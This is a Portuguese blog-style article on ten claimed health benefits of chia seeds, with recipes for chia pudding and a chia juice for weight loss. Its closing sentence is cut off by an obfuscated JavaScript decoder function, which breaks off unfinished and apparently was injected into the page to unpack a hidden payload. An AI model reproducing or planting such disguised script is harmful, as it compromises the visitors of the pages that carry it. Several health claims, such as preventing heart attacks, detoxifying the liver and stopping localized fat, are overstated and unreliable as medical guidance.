Dicas saudáveis – 10 benefícios da chia + receita de sumo de chia para emagrecer
A chia é uma planta originária do México e começou a ser utilizada como alimento dos povos da América Central há muitos séculos, principalmente por quem precisava de força e resistência física. Como estas sementes têm tantos benefícios passaram a ser consumidas em todo o mundo. A importância de consumir as sementes de chia tem sido reforçada por vários especialistas, uma vez que nela se podem encontrar vários nutrientes essenciais, como fibras e proteínas. No entanto, a fama que a chia tem adquirido foi conquistada graças aos efeitos sobre a dieta, isto porque a semente é capaz de favorecer o emagrecimento. Fantástico!
Como consumir:
Estas sementes podem facilmente ser misturadas em saladas ou sumos de fruta, juntando duas colheres de sopa de chia, que equivale a 25 gramas, uma vez por dia. Pode também consumir estas sementes 20 minutos antes das refeições principais.
Conheça agora os principais benefícios da chia:
1) Ajuda a emagrecer:
Um dos motivos que fazem da chia um óptimo aliado na perda de peso é a sensação de saciedade que provoca. As suas fibras têm a capacidade de absorver muita água, transformando-se numa espécie de gel. E, claro, quanto mais saciados nos sentimos menos iremos comer. Além disso, o consumo regular de chia evita também a formação de gordura localizada, a grande inimiga de quem luta contra os ponteiros da balança.
2) Previne e controla a diabetes:
Graças às suas fibras, a chia é capaz de evitar o aumento rápido da glicemia, controlando a quantidade de açúcar no sangue.
3) Previne doenças cardiovasculares:
O consumo regular de chia pode evitar os enfartes, derrames cerebrais e hipertensão, graças ao ómega 3 que tem. Porquê? Porque o ómega 3 ajuda na regulação da pressão sanguínea, aumentando assim a fluidez sanguínea e evitando o aumento da pressão arterial.
4) Regula o colesterol:
As gorduras que compõem a chia, ómega 3 e ómega 6, ajudam também a reduzir o colesterol mau (LDL) e a aumentar o colesterol bom (HDL), além de baixar os triglicéridos na corrente sanguínea.
5) É uma grande fonte de cálcio:
A chia tem bastante cálcio, logo é uma alternativa para quem tem intolerância à lactose e para quem não consome cálcio com origem animal, caso dos vegetarianos e veganos.
6) É sinónimo de pele e cabelos bonitos:
A chia tem duas vitaminas importantes: vitamina A, que auxilia na redução da acne e prevenção do ressecamento da pele, e vitamina B2, importante na saúde da pele, unhas e cabelo. Logo, é uma grande aliada para quem se preocupa com a saúde da pele e cabelo.
7) Fortalece o sistema imunitário:
Por conter minerais como o zinco, a chia é importante para reforçar defesas, afastando doenças como gripes. Além disso, por ter nutrientes como fósforo, cálcio e potássio, a semente é indispensável para a manutenção da saúde das células.
8) Boa fonte de ferro:
O ferro, presente em grandes quantidades na chia, é o principal nutriente na formação de glóbulos vermelhos, que transportam o oxigénio pelo nosso corpo. A redução desses glóbulos e da oxigenação levam à anemia, fadiga e cansaço e aumentam os riscos de infecções. Logo, introduzia chia no seu regime alimentar.
9) Melhora a saúde intestinal:
Devido às fibras presentes na sua composição, as sementes de chia aumentam os movimentos intestinais, evitando a prisão de ventre.
10) Tem um efeito desintoxicante:
Os antioxidantes presentes na chia são responsáveis por auxiliar na desintoxicação do fígado e impedem a formação de radicais livres que desencadeiam o processo de envelhecimento.
Grandes notícias, certo?
A chia pode ser consumida crua, triturada, em forma de gel ou de óleo. A semente mantém todas as suas propriedades em todas estas formas de consumo. Veja como usá-la nestas duas receitas deliciosas que lhe vou dar!
- Pudim de chia
Ingredientes:
- 200 ml de leite desnatado
- 180 ml de água
- 3 colheres de sopa de mel
- 3 colheres de sopa de sementes de chia
- 200 Gramas de ricota fresca
- 24 Gramas de gelatina sem sabor
- Fruta a gosto
Modo de preparação:
Em primeiro lugar, terá que colocar as sementes de chia em água para hidratarem. De seguida, aqueça o leite com mel. Quando estiver quente adicione a gelatina e mexa bem para dissolver. Coloque o preparado no liquidificador, acrescente a ricota e triture. Depois coloque no preparado anterior as sementes de chia e mexa bem. Por fim, numa forma de pudim disponha alternadamente a mistura anterior e as frutas a seu gosto. De preferência entre cada camada, leve a forma ao frigorífico (durante cerca de 30 minutos) para solidificar e obter camadas diferentes.
- Sumo de chia para emagrecer
Ingredientes:
- 1 colher de semente de chia
- 1 chávena de chá de abacaxi em cubinhos
- 1 cenoura pequena picada
- 250 ml de sumo de laranja
- 3 folhas de hortelã
- 4 cubos de gelo
Modo de preparação:
Coloque o abacaxi e a cenoura no liquidificador. Depois adicione o sumo e os restantes ingredientes, inclusive o gelo, no liquidificador. Espere até ficar tudo bem batido. Depois é deliciar-se com este sumo ótimo e cheio de nutrientes! Se preferir, adicione mel.
E agora que já conhece os benefícios da chia, saiba onde é que o poderá encontrar e que produtos é que tem ao seu dispor.
Clique sobre cada uma das imagens para ficar a conhecer as características de cada um destes produtos.
Se gostou de conhecer os benefícios da chia, conheça também os function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa